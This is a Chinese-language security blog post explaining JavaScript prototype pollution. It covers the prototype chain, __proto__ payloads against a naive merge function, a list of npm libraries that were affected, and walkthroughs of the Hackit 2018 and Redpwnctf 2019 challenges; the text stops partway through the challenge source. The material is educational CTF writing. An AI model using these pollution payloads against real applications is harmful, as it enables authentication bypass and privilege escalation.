<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content>
    <meta name="keyword" content>
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        javascript原型链污染 - Monitor&#39;s Blog
        
    </title>

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/aircloud.css">
    <link rel="stylesheet" href="/css/gitment.css">
    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_pl6z7sid89qkt9.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>
    <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
    <link rel="stylesheet" href="/js/fancybox/dist/jquery.fancybox.min.css">
    <script src="/js/fancybox/dist/jquery.fancybox.min.js"></script>
    <script src="/js/wrap.js"></script>
</head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i> Never be afraid to try and fail. </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar">
            <img src="/img/avatar.jpg" />
        </div>
        <div class="name">
            <i>monitor</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li >
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>Home</span>
                </a>
            </li>
            <li >
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>Tags</span>
                </a>
            </li>
            <li >
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>Archive</span>
                </a>
            </li>
            <li >
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>About</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#javascript原型与原型链"><span class="toc-text">javascript原型与原型链</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#prototype"><span class="toc-text">prototype</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#proto"><span class="toc-text">__proto__</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#constructor-NaN"><span class="toc-text">constructor</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#原型链"><span class="toc-text">原型链</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#原型链继承"><span class="toc-text">原型链继承</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#原型链污染"><span class="toc-text">原型链污染</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#哪些情况会导致原型链污染"><span class="toc-text">哪些情况会导致原型链污染</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#对象merge"><span class="toc-text">对象merge</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#受影响库-merge"><span class="toc-text">受影响库(merge)</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#对象clone"><span class="toc-text">对象clone</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#按路径定义属性"><span class="toc-text">按路径定义属性</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hackit-2018"><span class="toc-text">Hackit 2018</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Redpwnctf-2019"><span class="toc-text">Redpwnctf 2019</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Code-breaking-thejs"><span class="toc-text">Code-breaking_thejs</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#END"><span class="toc-text">END</span></a></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input"/>
            <span id="begin-search">搜索</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>
        <div class="index-about-mobile">
            <i> Never be afraid to try and fail. </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        javascript原型链污染
    </div>

    <div class="post-meta">
        <span class="attr">发布于：<span>2019-11-27 20:44:53</span></span>
        
        <span class="attr">标签：/
        
        <a class="tag" href="/tags/#javascript" title="javascript">javascript</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">访问：<span id="busuanzi_value_page_pv"></span>
</span>
</span>
    </div>
    <div class="post-content ">
        <p><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="86" src="//music.163.com/outchain/player?type=2&id=1405370564&auto=1&height=66"></iframe></p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>以前听到过javascript原型链污染，感觉听起来蛮厉害的样子，当时忙着别的事情也就一直没有抽时间来看，正好最近没什么事，于是便学一学这个攻击方法，个人认为还是觉得蛮有趣的。</p>
<h2 id="javascript原型与原型链"><a href="#javascript原型与原型链" class="headerlink" title="javascript原型与原型链"></a>javascript原型与原型链</h2><p>在 ES6 之前，JavaScript 中没有 class 语法，如今我们想定义一个类，可以通过“构造函数”的方式：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&gt; <span class="function"><span class="keyword">function</span> <span class="title">ba</span>(<span class="params"></span>)</span>&#123;        </span><br><span class="line">... this.id = <span class="number">20</span>        </span><br><span class="line">... this.name = <span class="string">'admin'</span> </span><br><span class="line">... &#125;                   </span><br><span class="line"><span class="literal">undefined</span>               </span><br><span class="line">&gt; <span class="keyword">var</span> a = <span class="keyword">new</span> b         </span><br><span class="line">&gt; <span class="keyword">var</span> a = <span class="keyword">new</span> ba        </span><br><span class="line"><span class="literal">undefined</span>               </span><br><span class="line">&gt; a.id                  </span><br><span class="line"><span class="number">20</span>                      </span><br><span class="line">&gt; a.name                </span><br><span class="line"><span class="string">'admin'</span></span><br></pre></td></tr></table></figure>
<p>构造函数<code>ba()</code>就是<code>ba</code>类，这里的 <code>this.id,this.name</code>就是<code>ba</code>类的属性</p>
<p>一个类除了有属性，肯定也会有各种方法，我们也可以在类中定义它的方法:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&gt; <span class="function"><span class="keyword">function</span> <span class="title">Myclass</span>(<span class="params"></span>)</span>&#123;                             </span><br><span class="line">... this.id = <span class="number">6</span>                                   </span><br><span class="line">... this.show = <span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;                       </span><br><span class="line">..... console.log(<span class="keyword">this</span>.id)                        </span><br><span class="line">..... &#125;                                           </span><br><span class="line">... &#125;                                             </span><br><span class="line"><span class="literal">undefined</span></span><br><span class="line">&gt; <span class="keyword">var</span> c = <span class="keyword">new</span> Myclass()                           </span><br><span class="line"><span class="literal">undefined</span>                                        </span><br><span class="line">&gt; c.show                                          </span><br><span class="line">[<span class="built_in">Function</span>]                                        </span><br><span class="line">&gt; c.show()                                        </span><br><span class="line"><span class="number">6</span>                                                 </span><br><span class="line"><span class="literal">undefined</span></span><br></pre></td></tr></table></figure>
<p>但是这样写会导致我们每次创建<code>Myclass</code>对象时候就会执行一次这个<code>show</code>方法，这个方法实际上绑定在对象上，而不是类上。</p>
<h3 id="prototype"><a href="#prototype" class="headerlink" title="prototype"></a>prototype</h3><p>每个类(构造函数)都会有一个<code>prototype</code>属性，且该类的实例化对象，都会拥有这个属性中的所有内容，即方法和属性：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&gt; <span class="function"><span class="keyword">function</span> <span class="title">Myclass</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">... this.age = <span class="number">20</span>    </span><br><span class="line">... &#125;</span><br><span class="line">&gt; Myclass.prototype.show = <span class="function"><span class="keyword">function</span> <span class="title">show</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">... console.log(<span class="keyword">this</span>.age)</span><br><span class="line">... &#125;</span><br><span class="line">[<span class="built_in">Function</span>: show]</span><br><span class="line">&gt; <span class="keyword">var</span> x= <span class="keyword">new</span> Myclass</span><br><span class="line"><span class="literal">undefined</span></span><br><span class="line">&gt; x.show</span><br><span class="line">[<span class="built_in">Function</span>: show]</span><br><span class="line">&gt; x.show()</span><br><span class="line"><span class="number">20</span></span><br><span class="line"><span class="literal">undefined</span></span><br></pre></td></tr></table></figure>
<p>其次，我们可以通过<code>prototype</code>来访问其原型：</p>
<p><img src="/2019/11/27/javascript-proto-attack/1.png" alt></p>
<p>可以看到，类的原型是<code>Object</code>，但是实例化的对象，就不能直接通过<code>prototype</code>来访问原型的</p>
<h3 id="proto"><a href="#proto" class="headerlink" title="__proto__"></a>__proto__</h3><p>每个实例化的对象，都会有一个<code>__proto__</code>属性，指向实例对象的原型</p>
<p><img src="/2019/11/27/javascript-proto-attack/2.png" alt></p>
<p>仔细看，可能你会发现，实例化对象的原型和类的原型是相等的，其实<code>a.__proto__</code>就是指向<code>Myclass.prototype</code>的</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">console</span>.log(a.__proto == Myclass.prototype)<span class="comment">//True</span></span><br></pre></td></tr></table></figure>
<p>所以，可以得出两点：</p>
<ol>
<li><code>prototype</code>是一个类的属性，所有类对象在实例化的时候将会拥有<code>prototype</code>中的属性和方法</li>
<li>一个对象的<code>__proto__</code>属性，指向这个对象所在的类的<code>prototype</code>属性</li>
</ol>
<h3 id="constructor-NaN"><a href="#constructor-NaN" class="headerlink" title="constructor"></a>constructor</h3><p>在上面图片中，我们应该看到过<code>constructor</code>这个属性，每个原型对象都有一个 <code>constructor</code> 属性，指向相关联的构造函数，所以构造函数和构造函数的 <code>prototype</code> 是可以相互指向的。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; Myclass.prototype.constructor</span><br><span class="line">[<span class="built_in">Function</span>: Myclass]</span><br></pre></td></tr></table></figure>
<p>关系如下：</p>
<p><img src="/2019/11/27/javascript-proto-attack/3.png" alt></p>
<h3 id="原型链"><a href="#原型链" class="headerlink" title="原型链"></a>原型链</h3><p>在<code>javascript</code>中，如果对象要访问一个属性，步骤如下</p>
<p><img src="/2019/11/27/javascript-proto-attack/4.png" alt></p>
<p> 以此内推，直到找到这个属性或者到达了最顶层 </p>
<p>其次就是，实例对象的原型是<code>object.prototype</code>，但是他的原型是null，所以<code>object.prototype</code>就是原型链的顶端。</p>
<p><img src="/2019/11/27/javascript-proto-attack/5.png" alt></p>
<h2 id="原型链继承"><a href="#原型链继承" class="headerlink" title="原型链继承"></a>原型链继承</h2><p>javascript的继承机制，就是利用了实例化对象会拥有prototype属性内的所有属性和方法。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Father</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.first_name = <span class="string">'Donald'</span></span><br><span class="line">    <span class="keyword">this</span>.last_name = <span class="string">'Trump'</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Son</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.first_name = <span class="string">'Melania'</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">Son.prototype = <span class="keyword">new</span> Father()</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> son = <span class="keyword">new</span> Son()</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">`Name: <span class="subst">$&#123;son.first_name&#125;</span> <span class="subst">$&#123;son.last_name&#125;</span>`</span>)</span><br><span class="line"><span class="comment">// 输出：Name: Melania Trump。</span></span><br></pre></td></tr></table></figure>
<h2 id="原型链污染"><a href="#原型链污染" class="headerlink" title="原型链污染"></a>原型链污染</h2><p>首先给一个简单的例子：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&gt; <span class="keyword">var</span> a = &#123;<span class="attr">admin</span>:<span class="number">1</span>&#125;</span><br><span class="line"><span class="literal">undefined</span></span><br><span class="line">&gt; a.admin</span><br><span class="line"><span class="number">1</span></span><br><span class="line">&gt; a.__proto__.admin = <span class="number">2</span></span><br><span class="line"><span class="number">2</span></span><br><span class="line">&gt; <span class="keyword">var</span> b = &#123;&#125;</span><br><span class="line"><span class="literal">undefined</span></span><br><span class="line">&gt; b.admin</span><br><span class="line"><span class="number">2</span></span><br></pre></td></tr></table></figure>
<p>这里看到，b为空的，但是却访问到存在<code>admin</code>属性，并且修改了它的值。这是因为我们通过<code>a.__proto__.admin = 2</code>修改了a的原型，即<code>Object</code>,而这里b的原型也是<code>Object</code>，所以自然会有一个admin属性。</p>
<h3 id="哪些情况会导致原型链污染"><a href="#哪些情况会导致原型链污染" class="headerlink" title="哪些情况会导致原型链污染"></a>哪些情况会导致原型链污染</h3><ul>
<li>对象merge</li>
<li>对象clone( 将待操作的对象merge到一个空对象中 )</li>
<li>按路径定义属性 </li>
</ul>
<h4 id="对象merge"><a href="#对象merge" class="headerlink" title="对象merge"></a>对象merge</h4><p>通常来讲，我们需要能控制一个参数和它对应的值,格式如下：</p>
<p><code>obj[a][b]=value</code> 攻击=&gt; <code>obj[__proto__][attribute]=myvalue</code></p>
<p>还有一种情况就是：</p>
<p><code>obj[a][b][c]=value</code> 攻击=&gt; <code>obj[constructor][prototype][attribute]=myvalue</code></p>
<p>但是这种方法需要两个可控参数，攻击环境比较苛刻</p>
<p>例子：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">merge</span>(<span class="params">target, source</span>) </span>&#123;</span><br><span class="line">      <span class="keyword">for</span> (<span class="keyword">let</span> key <span class="keyword">in</span> source) &#123;</span><br><span class="line">          <span class="keyword">if</span> (key <span class="keyword">in</span> source &amp;&amp; key <span class="keyword">in</span> target) &#123;</span><br><span class="line">              merge(target[key], source[key])</span><br><span class="line">          &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">              target[key] = source[key]</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line"><span class="keyword">var</span> a1 = &#123;&#125;</span><br><span class="line"><span class="keyword">var</span> a2 = <span class="built_in">JSON</span>.parse(<span class="string">'&#123;"a":1,"__proto__":&#123;"b":2&#125;&#125;'</span>)</span><br><span class="line">merge(a1,a2)</span><br><span class="line"><span class="comment">// console.log(a1.a,a2.b)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> a3 = &#123;&#125;</span><br><span class="line"><span class="built_in">console</span>.log(a3.b)<span class="comment">//2</span></span><br></pre></td></tr></table></figure>
<p>这里merege会遍历a2所有键名，但是这个<code>__proto__</code>会被当做a2原型，所以要json解析<code>__proto__</code>为键名才能污染原型链。merge操作是最常见的键名操作，也是最可能被原型链攻击，很多库都存在这个问题。</p>
<h5 id="受影响库-merge"><a href="#受影响库-merge" class="headerlink" title="受影响库(merge)"></a>受影响库(merge)</h5><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">hoek.<span class="built_in">merge</span></span><br><span class="line">hoek.applyToDefaults</span><br><span class="line">Fixed <span class="keyword">in</span> <span class="built_in">version</span> <span class="number">4.2</span><span class="number">.1</span></span><br><span class="line">Fixed <span class="keyword">in</span> <span class="built_in">version</span> <span class="number">5.0</span><span class="number">.3</span></span><br><span class="line"></span><br><span class="line">lodash.defaultsDeep</span><br><span class="line">lodash.<span class="built_in">merge</span></span><br><span class="line">lodash.mergeWith</span><br><span class="line">lodash.<span class="built_in">set</span></span><br><span class="line">lodash.setWith</span><br><span class="line">Fixed <span class="keyword">in</span> <span class="built_in">version</span> <span class="number">4.17</span><span class="number">.12</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">merge</span>.recursive(mereg)</span><br><span class="line">defaults-deep</span><br><span class="line">Fixed <span class="keyword">in</span> <span class="built_in">version</span> <span class="number">0.2</span><span class="number">.4</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">merge</span>-objects</span><br><span class="line">assign-deep</span><br><span class="line">Fixed <span class="keyword">in</span> <span class="built_in">version</span> <span class="number">0.4</span><span class="number">.7</span></span><br><span class="line"></span><br><span class="line">Merge-deep</span><br><span class="line">Fixed <span class="keyword">in</span> <span class="built_in">version</span> <span class="number">3.0</span><span class="number">.1</span></span><br><span class="line"></span><br><span class="line">mixin-deep</span><br><span class="line">Fixed <span class="keyword">in</span> <span class="built_in">version</span> <span class="number">1.3</span><span class="number">.1</span></span><br><span class="line"></span><br><span class="line">deep-extend</span><br><span class="line">Not fixed. Package maintainer didn’t respond <span class="built_in">to</span> <span class="keyword">the</span> disclosure.</span><br><span class="line"><span class="built_in">merge</span>-options</span><br><span class="line">Not fixed. Package maintainer didn’t respond <span class="built_in">to</span> <span class="keyword">the</span> disclosure.</span><br><span class="line"></span><br><span class="line">deap</span><br><span class="line">deap.extend</span><br><span class="line">deap.<span class="built_in">merge</span></span><br><span class="line">deap</span><br><span class="line">Fixed <span class="keyword">in</span> <span class="built_in">version</span> <span class="number">1.0</span><span class="number">.1</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">merge</span>-recursive</span><br><span class="line"><span class="built_in">merge</span>-recursive.recursive</span><br></pre></td></tr></table></figure>
<h4 id="对象clone"><a href="#对象clone" class="headerlink" title="对象clone"></a>对象clone</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">clone</span>(<span class="params">obj</span>) </span>&#123;</span><br><span class="line">	<span class="keyword">return</span> merge(&#123;&#125;, obj);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h4 id="按路径定义属性"><a href="#按路径定义属性" class="headerlink" title="按路径定义属性"></a>按路径定义属性</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">theFunction(object, path, value)</span><br></pre></td></tr></table></figure>
<p>如果攻击者可以控制<code>path</code>参数，那么就可以将值改为<code>__proto__.myValue</code>，那么<code>myvalue</code>将会被赋值给原型类<code>Object</code>造成原型链污染。</p>
<h2 id="Hackit-2018"><a href="#Hackit-2018" class="headerlink" title="Hackit 2018"></a>Hackit 2018</h2><p><strong>Republic_of_Gayming</strong> </p>
<p><code>app.js</code></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">app.get(<span class="string">'/admin'</span>, (req, res) =&gt; &#123; </span><br><span class="line">	<span class="comment">/*this is under development I guess ??*/</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>(user.admintoken &amp;&amp; req.query.querytoken &amp;&amp; md5(user.admintoken) === req.query.querytoken)&#123;</span><br><span class="line">		res.send(<span class="string">'Hey admin your flag is********'</span>);</span><br><span class="line">....</span><br><span class="line">app.post(<span class="string">'/api'</span>, (req, res) =&gt; &#123;</span><br><span class="line">	<span class="keyword">var</span> client = req.body;</span><br><span class="line">	<span class="keyword">var</span> winner = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (client.row &gt; <span class="number">3</span> || client.col &gt; <span class="number">3</span>)&#123;</span><br><span class="line">		client.row %= <span class="number">3</span>;</span><br><span class="line">		client.col %= <span class="number">3</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	matrix[client.row][client.col] = client.data;</span><br><span class="line">	<span class="built_in">console</span>.log(matrix);</span><br><span class="line">....</span><br></pre></td></tr></table></figure>
<p>这里附上部分源码，漏洞点在：<code>matrix[client.row][client.col] = client.data</code>，这里可以我们可控，所以也就是我上面说的一种情况。拿到flag的要求是<code>admintoken</code>要md5值要和<code>querytoken</code>相等，这里<code>admintoken</code>明显是不存在的，要求我们污染原型链才能符合要求。</p>
<p><img src="/2019/11/27/javascript-proto-attack/6.png" alt></p>
<h2 id="Redpwnctf-2019"><a href="#Redpwnctf-2019" class="headerlink" title="Redpwnctf 2019"></a>Redpwnctf 2019</h2><p> <strong>blueprint</strong></p>
<p><code>blueprint.js</code></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> _ = <span class="built_in">require</span>(<span class="string">'lodash'</span>) <span class="comment">//4.17.11</span></span><br><span class="line">....</span><br><span class="line"><span class="keyword">const</span> parseUserId = <span class="function">(<span class="params">cookies</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">if</span> (cookies === <span class="literal">undefined</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">null</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">const</span> userIdCookie = cookies.split(<span class="string">'; '</span>).find(<span class="function"><span class="params">cookie</span> =&gt;</span> cookie.startsWith(<span class="string">'user_id='</span>))</span><br><span class="line">  <span class="keyword">if</span> (userIdCookie === <span class="literal">undefined</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">null</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">decodeURIComponent</span>(userIdCookie.replace(<span class="string">'user_id='</span>, <span class="string">''</span>))</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> makeId = <span class="function"><span class="params">()</span> =&gt;</span> crypto.randomBytes(<span class="number">16</span>).toString(<span class="string">'hex'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// list of users and blueprints</span></span><br><span class="line"><span class="keyword">const</span> users = <span class="keyword">new</span> <span class="built_in">Map</span>()</span><br><span class="line"></span><br><span class="line">http.createServer(<span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">let</span> userId = parseUserId(req.headers.cookie)</span><br><span class="line">  <span class="keyword">let</span> user = users.get(userId)</span><br><span class="line">  <span class="keyword">if</span> (userId === <span class="literal">null</span> || user === <span class="literal">undefined</span>) &#123;</span><br><span class="line">    <span class="comment">// create user if one doesnt exist</span></span><br><span class="line">    userId = makeId()</span><br><span class="line">    <span class="keyword">const</span> bpProto = &#123;&#125;</span><br><span class="line">    <span class="keyword">const</span> flagBp = &#123;</span><br><span class="line">      content: flag,</span><br><span class="line">    &#125;</span><br><span class="line">    flagBp.constructor = &#123;<span class="attr">prototype</span>: bpProto&#125;</span><br><span class="line">    flagBp.__proto__ = bpProto</span><br><span class="line">    user = &#123;</span><br><span class="line">      bpProto,</span><br><span class="line">      blueprints: &#123;</span><br><span class="line">        [makeId()]: flagBp,</span><br><span class="line">      &#125;,</span><br><span class="line">    &#125;</span><br><span class="line">    users.set(userId, user)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// send back the user id</span></span><br><span class="line">  res.writeHead(<span class="number">200</span>, &#123;</span><br><span class="line">    <span class="string">'set-cookie'</span>: <span class="string">'user_id='</span> + <span class="built_in">encodeURIComponent</span>(userId) + <span class="string">'; Path=/'</span>,</span><br><span class="line">  &#125;)</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (req.url === <span class="string">'/'</span> &amp;&amp; req.method === <span class="string">'GET'</span>) &#123;</span><br><span class="line">    <span class="comment">// list all public blueprints</span></span><br><span class="line">    res.end(mustache.render(indexTemplate, &#123;</span><br><span class="line">      blueprints: <span class="built_in">Object</span>.entries(user.blueprints).map(<span class="function">(<span class="params">[k, v]</span>) =&gt;</span> (&#123;</span><br><span class="line">        id: k,</span><br><span class="line">        content: v.content,</span><br><span class="line">        public: v.public,</span><br><span class="line">      &#125;)),</span><br><span class="line">    &#125;))</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> 